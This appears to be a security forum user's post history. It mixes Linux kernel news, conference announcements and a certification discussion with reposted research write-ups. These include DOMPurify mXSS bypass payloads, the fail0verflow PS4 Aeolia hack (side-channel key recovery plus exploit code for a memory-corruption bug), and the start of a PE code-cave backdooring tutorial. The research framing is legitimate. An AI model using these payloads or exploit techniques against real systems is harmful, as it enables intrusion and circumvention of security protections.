Everything posted by Nytro
-
The call for papers is still open. You can apply here. The sponsorship options are here.
-
The Controversial Speck Encryption Code Will Indeed Be Dropped From The Linux Kernel
Written by Michael Larabel in Linux Kernel on 4 September 2018

While Google got the NSA-developed Speck into the Linux kernel on the basis of wanting to use Speck for file-system encryption on very low-end Android (Go) devices, last month they decided to abandon those plans and instead work out a new "HPolyC" algorithm for use on these bottom-tier devices, due to all the concerns over Speck potentially being back-doored by the US National Security Agency. After Google reverted their plans to use Speck for file-system encryption, it was called for removal from the Linux kernel, with no other serious users of this code...

Speck had been added to the crypto code in Linux 4.17 and then to the fscrypt bits for file-system encryption with Linux 4.18. But during the Linux 4.19 merge window that ended a week ago, the removal of Speck never occurred. While it didn't happen for this current kernel cycle, I noticed today that the Speck removal patch has been merged into the development crypto code base by subsystem maintainer Herbert Xu.

The patch merged overnight strips the kernel of Speck. This, along with the start of other early crypto code, will end up being merged in the next kernel cycle, though the patch is also marked for stable back-porting to currently supported stable series.

Sursa: https://www.phoronix.com/scan.php?page=news_item&px=Speck-Dropping-Next-Kernel
-
Dan Brown - Simbolul Pierdut
-
Romanian hacker: https://twitter.com/aionescu To be fair, he doesn't live in Romania, he was only born here... I hope you know who he is.
-
Something like that. But it looks good to HR. Well, seriously speaking, it does have its value. In fact, it is not a "pentest" certification, but one that gives its holder general "security" knowledge from a great many areas. It is useful for management positions, because "pentest" is only a small part of what "security" means.
-
CISSP, as it is described, tries to "cover a broad area, but with little depth". That is, it covers a great many topics from IT/Information Security, but does not go into detail. I understand they are trying to improve CEH and want to add practical components, but I don't know whether they have made much progress with the latest version. More relevant for a penetration tester would be GXPN from SANS, which also includes practical tests, and of course OSCP, where you have a 24-hour exam (not to mention that they recently introduced proctoring: to take the exam you have to keep your camera on, so they can make sure it is you taking it and not someone else in your place).
-
I have CISSP myself and it hasn't really helped me in my Penetration Tester career. And there are probably many who have it, but it is probably not enough to do a good job.
-
Before the conference, on September 25, there will also be a meetup: https://www.facebook.com/events/524117008034356/
-
BSides Bucharest is a non-profit, independently run, community-supported conference and part of the worldwide Security BSides movement. The idea behind the Security BSides Bucharest event is to organize a sales-pitch-free Information Security community where professionals, experts, researchers, and InfoSec enthusiasts come together to discuss.

Presenters – who should speak at the BSides Bucharest 2018 Conference?
- IT Security professionals
- IT Security enthusiasts
- Companies, organisations and anyone else that is interested in the IT Security field.

If you belong to one of those groups, you are cordially invited to submit a talk proposal (or a number of proposals). Please submit your proposals here. The deadline is October 15, 2018.

Please note: there is no guarantee that a submission will be put onto the conference agenda! The program committee picks the most interesting talk proposals and informs the selected submitters by 1 November 2018.

Any questions? Email the organizers at contact@bsidesbucharest.org

Details: https://bsidesbucharest.org
-
" Nice to have - one or more relevant certifications (CEH, CISSP, ...) "
-
Details have started to appear: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2018
-
Hey, you silly kids, think before you do something.
-
From C#/PowerShell you can do anything that can be done in C/C++, and some things can be done faster. I think that's why people get so excited about this kind of thing: there is less code to write, but there is nothing special about it. I haven't really run into any problems, mostly because I haven't worked that much with C# and .NET, but it can do a lot. Ah, yes, of course, with better chances of being "undetectable".
-
HTTPS Is Easy!

No, really, it's dead simple. This 4-part series takes you through the basics of adding HTTPS for free with Cloudflare.

Part 1: Adding HTTPS - Let's start by getting HTTPS configured on the site and all non-secure requests redirecting to the secure scheme.
Part 2: Optimising HTTPS - Let's now configure HTTPS to be as secure as possible, surpassing "bank grade security" in just a few clicks.
Part 3: Fixing Insecure References - Insecure references in the HTML can take away browser indicators and put users at risk - let's fix them!
Part 4: Encrypting Everything - Secure all the traffic not just between the browser and Cloudflare, but all the way back to the server.

A big thanks to the community for contributing closed captions in 17 different languages including: Czech, Danish, Dutch, English, Finnish, French, German, Greek, Indonesian, Italian, Norwegian, Persian, Polish, Russian, Slovenian, Spanish and Swedish.

Powered by Cloudflare. Built by Troy Hunt. Read more about this initiative in the launch blog post.

Sursa: https://httpsiseasy.com/
-
George Hotz, comma.ai - Forget reversible debugging, why is it that the concept of time exists in debugging at all? Viewing execution as a timeless trace, the open source tool QIRA (qira.me) attempts to move debugging into a new paradigm. Battle tested in CTFs, I will be presenting the tool and showing off a 10x speedup in the exploit development cycle. Sign up to find out more about Enigma conferences: https://www.usenix.org/conference/eni... Watch all Enigma 2016 videos at: http://enigma.usenix.org/youtube
-
In our presentation, we explain in detail how ME 11.x stores its state on the flash and the other types of file systems that are supported by ME 11.x. By Dmitry Sklyarov Full Abstract & Presentation Materials: https://www.blackhat.com/eu-17/briefi... How to Hack a Turned-Off Computer or Running Unsigned Code in Intel Management Engine: https://youtu.be/9fhNokIgBMU
-
Bypassing DOMPurify with mXSS
Sunday, 29 July 2018

I noticed DOMPurify would let you use the title tag when injecting a self-closing SVG. Normally it blocks title outside of SVG, however using the self-closing trick you could bypass that restriction.

<svg/><title>

Injecting the title tag is important because it mutates, as I've tweeted about in the past. In order for the mXSS to be effective I needed to inject the title tag outside of SVG, as DOMPurify/Edge would correctly encode the HTML. I found you could use "x" as a self-closing tag in DOMPurify and this would enable me to use the title tag outside of SVG. For example:

IN: <x/><title>test
OUT: <title>test</title>

Great, so I could get mXSS, right? Well, almost. I injected a mXSS vector with my "x" trick.

IN: <x/><title></title><img src=1 onerror=alert(1)>
OUT: <title></title><img src="1">

Damn, so DOMPurify was detecting the malicious HTML and removing the onerror attribute. But then I thought: what if this attribute is being read multiple times? Maybe I could inject a mXSS vector that mutates more than once. Here is the final vector, which is encoded multiple times so that it bypasses DOMPurify's attribute checks.

IN: <x/><title>&lt;/title&gt;&lt;img src=1 onerror=alert(1)&gt;
OUT: <title></title><img src=1 onerror=alert(1)></title>

The vector has been fixed in the latest version of Edge and has also been patched in DOMPurify version 1.0.7. If you want to experiment with the bypass then use DOMPurify 1.0.6 and Microsoft Edge 41.16299.547.0.

Sursa: http://www.thespanner.co.uk/2018/07/29/bypassing-dompurify-with-mxss/
-
2018-07-30 PS4 Aux Hax 1: Intro & Aeolia By ps4_enthusiast Filed under ps4 vulnerability exploit In the PS4 Aux Hax series of posts, we’ll talk about hacking parts of the PS4 besides the main x86 cores of the APU. In this first entry, we’ll give some background for context and describe how we managed to run arbitrary code persistently on Aeolia, the PS4 southbridge. Not shown in this post are the many iterations of failure which lead to success. The blog would be much too long The subtitle should be “power analysis for noobs”. Intro (Overview of SAA-001) Most of our experimentation is conducted against the SAA-001 version of the PS4 motherboard. This is the initial hardware revision which was released around the end of 2013. There are a few obvious reasons for this: Older hardware revisions are more likely to be populated with older components, resulting in e.g. chips with legs instead of BGA, slower clocks, functionality in discrete parts, etc. Early designs likely have more signals brought out for debugging Used/defective boards can be acquired cheaply Readily available media from initial teardowns/depopulation by third parties (ifixit, siliconpr0n, etc.) Using the resources from siliconpr0n and simple tools, as many wires as possible were mapped on the board. The final pin mapping which I’ve used throughout the work for this blog series can be found here. Interesting components outside the APU The areas of interest for this post are shown here: External to the APU, the main attractions are the “southbridge” (generally known as Aeolia) and syscon chips. Each is involved in talking to various peripherals on the board as well as controlling power sequencing for other components. Taking control of Aeolia is useful as it allows getting a foothold on the board in order to easily access busses shared with other chips. For example, control of Aeolia should allow performing attacks similar to our previous PCIe man-in-the-middle DMA attack against the APU - using only devices already present on the board. It also would allow easy access to the icc (aka ChipComm) interfaces of FreeBSD running on x86 (via PCIe), as well as the icc interface implemented on syscon (over SPI). As Aeolia is kind of the southbridge for the APU, it naturally would allow intercepting any storage (sflash, ddr3, hdd, …) or networking accesses as well. Finally, Aeolia is a self-contained SoC with multiple ARM cores which provides a decently beefy environment for experimenting with. Syscon is also interesting for other reasons, which will be elaborated upon in a future post. Aeolia Sizing up the target Early on, it was easy to discover the following about Aeolia: The cores which are active during “rest mode” (APU S3 state) are called “EAP” EAP runs FreeBSD and some usermode processes which can be dumped from DDR3 for reversing Some other component inside Aeolia is likely named “EMC” A shared-memory based protocol named “icc” can be used to communicate with EMC EMC can proxy icc traffic with syscon to/from APU Firmware updates (encrypted and signed) are available for Aeolia At first, we just wanted to be able to decrypt firmware updates in order to inspect what Aeolia really does and how it works with the rest of the system. The components in the firmware were relatively easy to identify, because the naming scheme of files stored in the filesystem (2BLS: BootLoaderStorage) is a 32bit number which identifies the processor it’s for as well as a number which more or less relates to the order it’s used in the boot process. 
Firmware update packages for Aeolia are essentially just raw filesystem blobs which will be written to sflash, so it’s easy to extract individual firmware components from a given firmware update package. The files in sflash for Aeolia consist of: File Name Name Dst CPU Notes C0000001 ipl SRAM EMC first stage fetched from sflash C0010001 eap_kbl DDR3 EAP EMC loads to boot EAP; contains FreeBSD So, we want to find a way to decrypt the ipl, preferably “offline” i.e. such that we can just directly decrypt the firmware images from update files. Considering that the ipl must be read and decrypted from sflash each time Aeolia powers up, this sounds like a perfect candidate for key recovery via power analysis! Setting up shop Recovering the decryption key via well-known attacks such as Correlation Power Analysis should be possible as long as the input data (ciphertext) is controllable to some extent. Initially, everything about the cryptographic schemes for encryption and validation were unknown. This results in a bit of a chicken/egg problem: determining if it’s worthwhile to take power traces for an eventual CPA attack requires doing mostly the same work as the CPA attack itself. As there’s no way around setting up a PS4 for trace acquisition, I just got on with it. Above, a murderedmodified PS4 for EMC power analysis. From bottom left: sflash replaced with flash simulator on FPGA main Aeolia clock (100MHz spread-spectrum) replaced with slowed down clock (~8MHz, non-SSC) from FPGA. Clockgen is disabled to minimize noise. aux. crystal replaced with wire Just a floating wire, used to manually input a “clock cycle”, which seems needed to unblock power-on-reset sequence (not needed for resets which keep power on) (near top right of Aeolia) power trace, extends to back of board and connects to EMC core power plane. Decoupling caps have been removed. (blue wire) replaced, “clean” power supply for EMC (white wire, top right) FPGA GPIO hooked to SC-RESET (not shown) FPGA exports a copy of base clock for oscilloscope refclk The setup settled on was based around simulating sflash on an FPGA in order to get as fast iteration times as possible. This choice also allowed easily exploring the bootrom’s parsing of sflash and ipl (explained in the next section). The SC-RESET test point was used as a hammer to cause a full-board reset, implicitly causing EMC to be rebooted by syscon. As for analysis/software tooling, the advanced numpy and baudline tools were used to analyze traces and eventually run the CPA attack. Power analysis as debugger Because the ipl was initially an opaque blob, we first needed to discover how the bootrom would parse sflash to arrive at the ipl, and then how the ipl itself would be parsed before the decryption of the ipl body. Investigating this parsing allowed discovering which parts of the filesystem and ipl blob were used, at which time they were used, and the bounds of any fields involved in the parsing. Simply viewing and diffing power traces proved to be a very effective tool for this. It was possible to check for possible memory corruption/logic bugs in the bootrom by simply modifing filesystem structures or ipl header fields and checking the power trace for irregularities. For example, once we had a good guess which field of the ipl header was the load address, we could try changing it in the hopes of hitting e.g. stack region in SRAM, and then check the trace to see if execution appeared to continue past the normal failure point. 
Unfortunately a bug was not found in this parsing, but this step helped a lot in understanding the layout of the ipl header and which fields we could change to attempt key recovery. By using power analysis, we determined the header of the ipl blob looked like: struct aeolia_ipl_hdr { u32 magic; // 0xd48ff9aa u8 field_4; u8 field_5; u8 field_6; u8 proc_type; // 0x48: EMC, 0x68: EAP u32 hdr_len; u32 body_len; u32 load_addr_0; u32 load_addr_1; // one is probably entrypoint.. u8 fill_pattern[0x10]; // DE AD BE EF CA FE BE BE DE AF BE EF CA FE BE BE u8 key_seed[0x8]; // F1 F2 F3 F4 F5 F6 F7 F8 // key_seed is used as input to 4 aes operations (2 blocks each) // some output of those operations is used as the key to decrypt the // following 5 blocks u8 wrapped_thing[0x20]; u8 signature[0x30]; // offset 0x80 u8 body[body_len]; }; See the full notes, including discovered bounds and parsing rules here. This was my first experience with power analysis, and I was quite encouraged by the capabilities so far To show how this was done (well, at least the parts relating to fields used in crypto operations), observe the following spectrograms from baudline. Note: the time units are meaningless. Above is the trace of the bootrom beginning to process the ipl. If you squint a bit, you can tell there are 4 nearly identical sections, then a long section which seems to be an extended version of one of the first four. Afterwards, longer, more stable periods are visible. Above is the result of comparing 5 traces to a single “base” trace. The method of comparison was to modify the contents of each 0x10 byte block in the header in the range of wrapped_thing and signature in turn, then mux the resulting trace with the base trace. This allows easy experimentation with baudline. As shown, baudline is actually performing subtraction between “channels” to produce the useful output. This immediately gives good information about what a block looks like in the spectrogram, the time taken to process it, the fact that modifications to a single block don’t have much influence on successive blocks, and most importantly, that we can feed arbitrary input into some decryption step. This implies the signature check of the header is done after decryption of wrapped_thing. Digging into the crypto While the above seems to bode well, there’s actually a snag. It appears the bootrom uses wrapped_thing as input to a block cipher and then signature checks the header. So it seems possible to recover the key used with wrapped_thing, however it’s not clear if this will give us all information needed to decrypt the ipl body. Additionally, the header is signature checked, so we can’t use an improper key to decrypt an otherwise valid body, then have EMC jump into garbage and hope for the best. In any case, I decided to try for recovery of the key used with wrapped_thing and hope I’d be able to figure out how to turn that into decryption of the body. Baby’s first DPA Before attempting key recovery, one must first locate the exact locations in power traces which can be used to identify the cipher and extract information about the key. Starting from not much info (just know it’s a 0x10 byte block cipher), we can guess it’s probably AES and try to see if it makes sense. The method to do this is essentially the same as Differential Power Analysis: identify the probable location of the first sbox lookup, take a bunch of traces with varying input, then apply sum of absolute differences to determine if the acquired traces “look like” AES. 
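As a rough illustration of the trace-diffing / sum-of-absolute-differences idea described above, here is a minimal numpy sketch. This is my own assumption of how such a comparison could be done, not fail0verflow's actual tooling (beyond their mention of numpy), and it presumes the traces have already been captured, aligned and stored as rows of a 2-D array:

import numpy as np

def sad_per_trace(base_trace, traces):
    # Sum of absolute differences of each captured trace against a "base"
    # trace taken with an unmodified header. Rows of `traces` correspond to
    # headers with one 0x10-byte block modified at a time.
    return np.abs(traces - base_trace).sum(axis=1)

def diff_profile(base_trace, traces):
    # Per-sample mean absolute difference: peaks show *when* the modified
    # bytes are actually consumed by the bootrom (e.g. the first S-box
    # lookups of a round), which is what makes the traces "look like" AES.
    return np.abs(traces - base_trace).mean(axis=0)

# Example: locate the sample index with the strongest data dependence.
# profile = diff_profile(base, traces); print(profile.argmax())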
Fortunately, this process yielded very straightforward results: (Sorry, you’ll probably need to open the images at full resolution to inspect them) ^ High level view of a complete block being passed through the cipher. If you squint you may be able to discern 10 rounds. The top is a singular raw trace, while the bottom group plots the sum of differences between all traces. ^ Closer view of the sum of differences. The above already makes it very likely to be AES. However, there is an additional check which may be done, which allows determining if the operation is encryption or decryption: ^ The same sum of differences, but making it obvious when, exactly, each bit position (of the input data) is used by the cipher. This can be easily correlated to most AES software implementations. For example, mbedtls: #define AES_RROUND(X0,X1,X2,X3,Y0,Y1,Y2,Y3) \ { \ X0 = *RK++ ^ AES_RT0( ( Y0 ) & 0xFF ) ^ \ AES_RT1( ( Y3 >> 8 ) & 0xFF ) ^ \ AES_RT2( ( Y2 >> 16 ) & 0xFF ) ^ \ AES_RT3( ( Y1 >> 24 ) & 0xFF ); \ // ... // in mbedtls_internal_aes_decrypt(...) GET_UINT32_LE( X0, input, 0 ); X0 ^= *RK++; GET_UINT32_LE( X1, input, 4 ); X1 ^= *RK++; GET_UINT32_LE( X2, input, 8 ); X2 ^= *RK++; GET_UINT32_LE( X3, input, 12 ); X3 ^= *RK++; for (i = (ctx->nr >> 1) - 1; i > 0; i--) { AES_RROUND(Y0, Y1, Y2, Y3, X0, X1, X2, X3); ///... With some squinting, it can be seen that the byte accesses generated by this first sbox lookup for decryption (and not encryption) matches the above plot. Recovering the key encryption key With the cipher used to process wrapped_thing more or less determined, we can switch to Correlation Power Analysis and attempt key recovery using only the section of traces which concern the first sbox lookup. Much time passes. Much confusion about how to filter traces ensues. Eventually, after tweaking the CPA method a bit and applying some filtering to ignore noise, the key recovery was successful! The correlation needed to be changed to use AES T-tables (the logic for which is actually described in the original AES proposal) instead of the standard inverted sbox approach. The hypothesized key was determined to be correct by running it though possible key derivation schemes which the bootrom would use, and then attempting to decrypt the first few blocks of the ipl body with the result. The winning combination was: # process blocks previously named wrapped_thing and signature # emc_header_key is the value recovered with CPA def emc_decrypt_header(hdr): return hdr[:0x30] + aes128_cbc_iv_zero_decrypt(emc_header_key, hdr[0x30:0x80]) hdr = emc_decrypt_header(f.read(0x80)) body_aes_key = hdr[0x30:0x40] body_len = struct.unpack('<L', hdr[0xc:0x10])[0] body = aes128_cbc_iv_zero_decrypt(body_aes_key, f.read(body_len)) Again, quite luckily the scheme is simple. Well, now what? Having originally only set out to decrypt ipl, we were, in some sense, done already. However, the exploratory power analysis revealed that the aeolia_ipl_hdr.key_seed could be used to cause the derived key to change. As such, any future firmware update which didn’t use the hardcoded key_seed of [F1 F2 F3 F4 F5 F6 F7 F8] would require redoing the key recovery. Quite unsavory! The determination of header field usages as well as reversing the (now decrypted) ipl also revealed that the “signatures” used to verify the ipl were likely just HMAC-SHA1 digests. In other words, the entire chain of trust on Aeolia is done with symmetric keys present inside every Aeolia chip. 
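Before moving on to the bootrom dump, here is a bare-bones sketch of the Correlation Power Analysis step described above, again as a hedged illustration rather than the authors' code: it uses a plain Hamming-weight-of-AddRoundKey leakage model for brevity, whereas the post notes the working attack needed T-table hypotheses and extra trace filtering.

import numpy as np

HW = np.array([bin(x).count("1") for x in range(256)], dtype=np.float64)

def cpa_rank_byte(traces, blocks, byte_idx):
    # traces: (n_traces, n_samples) aligned power traces (float)
    # blocks: (n_traces, 16) uint8 input blocks fed to the cipher
    # Returns key-byte guesses sorted by their best absolute Pearson
    # correlation across all sample points.
    t_c = traces - traces.mean(axis=0)
    t_norm = np.sqrt((t_c ** 2).sum(axis=0))
    ranking = []
    for guess in range(256):
        hyp = HW[blocks[:, byte_idx] ^ guess]  # hypothetical leakage
        h_c = hyp - hyp.mean()
        corr = np.abs(h_c @ t_c) / (np.sqrt((h_c ** 2).sum()) * t_norm)
        ranking.append((corr.max(), guess))
    return sorted(ranking, reverse=True)

# best_guess = cpa_rank_byte(traces, blocks, 0)[0][1]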
With the likely location of this HMAC key being the bootrom, we set out to dump the bootrom. Bootrom dumpin’ The chosen method of dumping EMC bootrom was by exploiting some software bug in ipl code. The first part of the ipl code to catch my eye while reversing was the UART protocol (called ucmd), which allows a small set of commands to be used to interact with EMC. The list of commands, along with privileges required to use the commands, is: Command Name Auth Level _hdmi INT boot A_AUTH bootadr A_AUTH bootenable A_AUTH bootmode A_AUTH buzzer A_AUTH cb A_AUTH cclog A_AUTH ccom INT ccul INT cec A_AUTH cktemprid A_AUTH csarea A_AUTH ddr A_AUTH ddrr A_AUTH ddrw A_AUTH devpm A_AUTH dled A_AUTH dsarea A_AUTH ejectsw A_AUTH errlog ANY etempr A_AUTH fdownmode A_AUTH fduty A_AUTH flimit A_AUTH fmode A_AUTH fservo A_AUTH fsstate A_AUTH fstartup A_AUTH ftable A_AUTH halt A_AUTH haltmode A_AUTH hdmir A_AUTH hdmis A_AUTH hdmistate A_AUTH hdmiw A_AUTH help INT mbu A_AUTH mduty A_AUTH nvscsum A_AUTH nvsinit A_AUTH osarea A_AUTH osstate A_AUTH pcie A_AUTH pdarea A_AUTH powersw A_AUTH powupcause A_AUTH r16 A_AUTH R16 A_AUTH R32 A_AUTH r32 A_AUTH R8 A_AUTH r8 A_AUTH resetsw A_AUTH rtc A_AUTH sb A_AUTH sbnvs A_AUTH scfupdbegin A_AUTH scfupddl A_AUTH scfupdend A_AUTH scnvsinit A_AUTH scpdis A_AUTH screset A_AUTH scversion ANY sdnvs A_AUTH smlog A_AUTH socdmode A_AUTH socuid A_AUTH ssbdis A_AUTH startwd A_AUTH state A_AUTH stinfo INT stopwd A_AUTH stwb A_AUTH syspowdown A_AUTH task INT tempr A_AUTH testpcie A_AUTH thrm A_AUTH uareq1 ANY uareq2 ANY version ANY W16 A_AUTH w16 A_AUTH W32 A_AUTH w32 A_AUTH w8 A_AUTH W8 A_AUTH wsc INT where ANY indicates the command is always available, A_AUTH means you must use the uareq commands to authenticate successfully, and INT most likely means “internal only”. A quick review of the ANY command set didn’t reveal exploitable vulnerabilities. However, it should be noted that the uareq commands are designed such that uareq1 allows you to request a challenge buffer, and uareq2 allows you to send a response. However, since the total challenge/response buffer size is larger than can fit in a single ucmd packet, the transfer is split into 5 chunks. Naturally the response cannot be verified until the complete response is received by EMC, so never sending the last chunk results in being able to place arbitrary data at a known static address in EMC SRAM. This will be useful later The next places to look were: Places data is read from sflash by EMC icc command handlers exposed to the APU No luck with bugs in sflash parsing paths :‘( Quite sad now, I focused on the APU-accessible icc interface. It turns out icc (at least as implemented on EMC) is quite complex. Handling a single message can cause many buffers to be allocated, queued, copied, and free’d multiple times. The system also supports acting as a proxy for other icc endpoints (syscon and emc uart). 
In any case, a usable bug was found relatively quickly in some hdmi-related icc command handler: /* Call stack: HdmiSeqTable_setReg HdmiSeqTable_execSubCmd sub_1170BA hcmd_srv_10_deliver */ int HdmiSeqTable_setReg(HdmiSubCmdHdr *cmd, int a2, int a3, void *a4, int first_exec, void *a6) { int item_type; // r0 int num_items; // r5 u8 *buf; // r4 int i; // r0 HdmiEdidRegInfo *v12; // r1 item_type = cmd->abstract; num_items = cmd->num; if (first_exec) return; buf = (u8 *)&cmd[1]; switch (item_type) { case 1: { HdmiEdidRegInfo *src = (HdmiEdidRegInfo *)buf; for (i = 0; i < num_items; ++i) { // edid_regs_info is HdmiEdidRegInfo[4] in .data // addr is 0x152E3B in this case v12 = &edid_regs_info[i]; v12->field_0 = src->field_0; v12->field_1 = src->field_1; v12->field_2 = src->field_2; src++; } } break; //... } //... } This is an amusingly annoying primitive: starting from a static address, we can continously write 3 of every 4 bytes (see below for struct definitions). Since the base address (0x152E3B) is not naturally aligned, and all pointers stored in memory will be aligned, this becomes somewhat annoying. Also, the overwrite will trample over everything within range, so the closest corruption target as possible is needed. Luckily, there is a good target: The OS’s task objects are stored nearby. The OS appears to be some version of ThreadX with a uITRON wrapper. In any case, the struct being overwritten looks like: 00000000 ui_tsk struc ; (sizeof=0x130, mappedto_101) 00000000 00000000 tsk_obj TX_THREAD ? ... 00000000 TX_THREAD struc ; (sizeof=0xAC, align=0x4, mappedto_102) 00000000 00000000 tx_thread_id DCD ? 00000004 tx_thread_run_count DCD ? 00000008 tx_thread_stack_ptr DCD ? ... Considering aligment, low 2 bytes of the tx_thread_stack_ptr can be controlled by the overwrite, and the rest of the structure need not be corrupted. This is perfect, as ThreadX uses the field like so: ROM:00111E60 LDR.W R12, [R3,#TX_THREAD.tx_thread_stack_ptr] ROM:00111E64 LDMIA.W R12!, {R4-R11} ROM:00111E68 MSR.W PSP, R12 ROM:00111E6C MOV LR, #0xFFFFFFFD ROM:00111E70 BX LR In other words, if we can point tx_thread_stack_ptr at some controlled memory, we get control of all GPRs, including SP. And since it’s returning from interrupt, PC and PSR as well. With great luck, the buffer used by uareq2 is able to be reached just by changing the low 2 bytes (well, mainly because SRAM is so small, and the stacks are statically allocated in a convenient position). The exploit method is: Place a fake exception frame at a known address with ucmd uareq2. Use the bug to overwrite the tx_thread_stack_ptr of a task. Wait for the runtime to switch tasks and resume the thread via the modified tx_thread_stack_ptr. Sending UART traffic forces task switching, so we can get control instantly. Exception frame placing (via UART): ucmd_ua_buf = 0x15AD90 r0 = r1 = r2 = r3 = r4 = r5 = r6 = r7 = r8 = r9 = r10 = r11 = r12 = 0 lr = pc = psr = 0 r6 = 0 # src r7 = 0xffff # len pc = 0x135B94 | 1 # print loop lr = pc psr = 1 << 24 fake_frame = struct.pack('<%dL' % (8 + 5 + 3), r4, r5, r6, r7, r8, r9, r10, r11, r0, r1, r2, r3, r12, lr, pc, psr) uc.uareq2(fake_frame) 0x135B94 is part of the inner loop of a hexdump-like function. This will result in spewing the bootrom (located @ addr 0 in EMC address space) out of UART. Perfect! 
Trigger code (via icc from APU): struct PACKED HdmiSubCmdTopHdr { u8 abstract; u16 size; u8 num_subcmd; }; struct PACKED HdmiSubCmdHdr { u8 ident; u8 size; u8 abstract; u8 num; }; struct PACKED HdmiEdidRegInfo { u8 field_0; u8 field_1; u8 field_2; u8 _unused; }; struct PACKED ArmExceptFrame { // r4-r11 saved/restored by threadx u32 tx_regs[8]; u32 r0; u32 r1; u32 r2; u32 r3; u32 r12; u32 lr; u32 pc; u32 xpsr; }; void Icc::Pwn() { // the last HdmiEdidRegInfo will overlap // &ui_tsk_objs[1].tsk_obj.tx_thread_stack_ptr size_t num_infos = 232; size_t hdrs_len = sizeof(HdmiSubCmdTopHdr) + sizeof(HdmiSubCmdHdr); size_t infos_len = num_infos * sizeof(HdmiEdidRegInfo); size_t buf_len = hdrs_len; buf_len += infos_len; buf_len += sizeof(ArmExceptFrame); buf_len += 0x20; auto buf = std::make_unique<u8[]>(buf_len); memset(buf.get(), 0, buf_len); auto hdr_top = (HdmiSubCmdTopHdr *)buf.get(); auto hdr = (HdmiSubCmdHdr *)(hdr_top + 1); auto infos = (HdmiEdidRegInfo *)(hdr + 1); auto stack_ptr_overlap = &infos[num_infos - 1]; //auto fake_frame = (ArmExceptFrame *)(infos + num_infos); hdr_top->abstract = 0; hdr_top->size = buf_len; hdr_top->num_subcmd = 1; hdr->ident = 4; // not checked hdr->size = infos_len; hdr->abstract = 1; hdr->num = num_infos; // control lower 2bytes of tx_thread_stack_ptr // needs to point to fake_frame u32 ucmd_ua_buf = 0x15AD90; u32 fake_frame_addr = ucmd_ua_buf; printf("fake frame %8x %8x\n", fake_frame_addr, fake_frame_addr + 8 * 4); stack_ptr_overlap->field_1 = fake_frame_addr & 0xff; stack_ptr_overlap->field_2 = (fake_frame_addr >> 8) & 0xff; uintptr_t x = (uintptr_t)&stack_ptr_overlap->field_1; uintptr_t y = (uintptr_t)infos; printf("%8lx %8lx %8lx %8lx\n", x, y, x - y, 0x152E3B + x - y); HdmiSubCmd(buf.get(), buf_len); } …and yes, it worked Ok, NOW what? With the bootrom in hand, it was now possible to see the actual key derivation in friendly ARM code form. The bootrom does contain a lot of key material, however it mixes the values stored in ROM with a value read from fuses in addition to the key_seed from ipl header. Unfortunately, even with arbitrary code exec on EMC, the fused secret cannot be dumped - it just reads as all-0xff. Inspecting the bootrom code shows that it appears to set a mmio register bit to lock-out the fuse key until the next power cycle. At first it looks as if we’re stuck again. But, let’s take a closer look at how bootrom uses the fuse key: int decrypt_with_seed(_DWORD *data_out, emc_hdr *hdr, int *data_in, _DWORD *key) { u8 v6[32]; // [sp+8h] [bp-108h] u8 rk[0xc0]; // [sp+28h] [bp-E8h] u8 iv[16]; // [sp+E8h] [bp-28h] *(_QWORD *)v6 = hdr->key_seed; *(_QWORD *)&v6[8] = hdr->key_seed; *(_DWORD *)&v6[16] = *data_in; *(_DWORD *)&v6[20] = data_in[1]; *(_DWORD *)&v6[24] = data_in[2]; *(_DWORD *)&v6[28] = data_in[3]; *(_DWORD *)iv = 0; *(_DWORD *)&iv[4] = 0; *(_DWORD *)&iv[8] = 0; *(_DWORD *)&iv[12] = 0; if (aes_key_expand_decrypt(key, rk) < 0 || aes_cbc_decrypt(v6, v6, 0x20u, rk, iv) < 0) { return -1; } *data_out = *(_DWORD *)&v6[16]; data_out[1] = *(_DWORD *)&v6[20]; data_out[2] = *(_DWORD *)&v6[24]; data_out[3] = *(_DWORD *)&v6[28]; return 0; } // in main(): //... // read fuse key to stack *(_DWORD *)v98 = unk_5F2C5050; *(_DWORD *)&v98[4] = unk_5F2C5054; *(_DWORD *)&v98[8] = unk_5F2C5058; *(_DWORD *)&v98[12] = unk_5F2C505C; if (dword_5F2C504C == 1) { // re-executing rom code (fuse already locked)? 
then bail *(_DWORD *)v98 = 0; *(_DWORD *)&v98[4] = 0; *(_DWORD *)&v98[8] = 0; *(_DWORD *)&v98[12] = 0; return 0x86000005; } // lock fuse interface dword_5F2C504C = 1; // derive the keys using rom values, header seed, with fuse value as key // rom_constant_x are values stored in bootrom if ( decrypt_with_seed(emc_header_aes_key, &hdr, rom_constant_0, v98) < 0 || decrypt_with_seed(emc_header_hmac_key, &hdr, rom_constant_1, v98) < 0) { return 0x86000005; } //... (also yes, I did check if the fuse key remains on the stack. It doesn’t.) Hm…so we can easily feed arbitrary data into the key derivation by modifying the key_seed, and we know the first 16 byte block is just the 8 byte key_seed repeated twice. Smells like a job for CPA again! Recovering the fuse key Adjusting the power tracing setup slightly to collect data from a different time offset and modifying the header generation code to target the key_seed instead of wrapped_thing were the only changes needed to acquire suitable traces. In the analysis phase, the only change needed was to account for the data always consisting of a duplicated 8bytes. My workaround for this was to rely on the fact that the temporal location where each byte should be processed is well known (recall the mbedtls code from a previous section). Instead of taking just the top match per byte position from CPA results, I took the top two matches and placed them into the recovered key based on the temporal position of the match. This finally resulted in acquiring all keys stored inside Aeolia (at least, the revision on SAA-001, it seems other revisions used different keysets). Thus, we can freely encrypt and sign our own ipl, and therefor control all code being executed on Aeolia, forever Recommended reading Introduction to differential power analysis - IMO the most clear rationale of DPA Side-Channel Power Analysis of a GPU AES Implementation - Touches on T-table usage Greetz Thanks to Volodymyr Pikhur for the previous work done on EAP and EMC (some can be seen here) and flatz, who has helped with reversing and bug hunting. Sursa: https://fail0verflow.com/blog/2018/ps4-aeolia/
-
Backdooring PE files using code caves : OSCE/CTP Module 0x03
July 24, 2018

Hello readers, this post will cover backdooring of a PE file by using code caves. There are already good tools that do this for you, e.g. Backdoor Factory and Shellter, which will do the same job and even bypass the static analysis of a few antiviruses. I will be covering the manual approach of backdooring a PE file.

Let's understand some terms:

[x] PE file: The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems.

[x] Code cave: Wikipedia says - "A code cave is a series of null bytes in a process's memory. The code cave inside a process's memory is often a reference to a section of the code's script functions that have capacity for the injection of custom instructions. For example, if a script's memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes can be used to add external code to the script."

[x] Shellcode: Wikipedia - "A shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode."

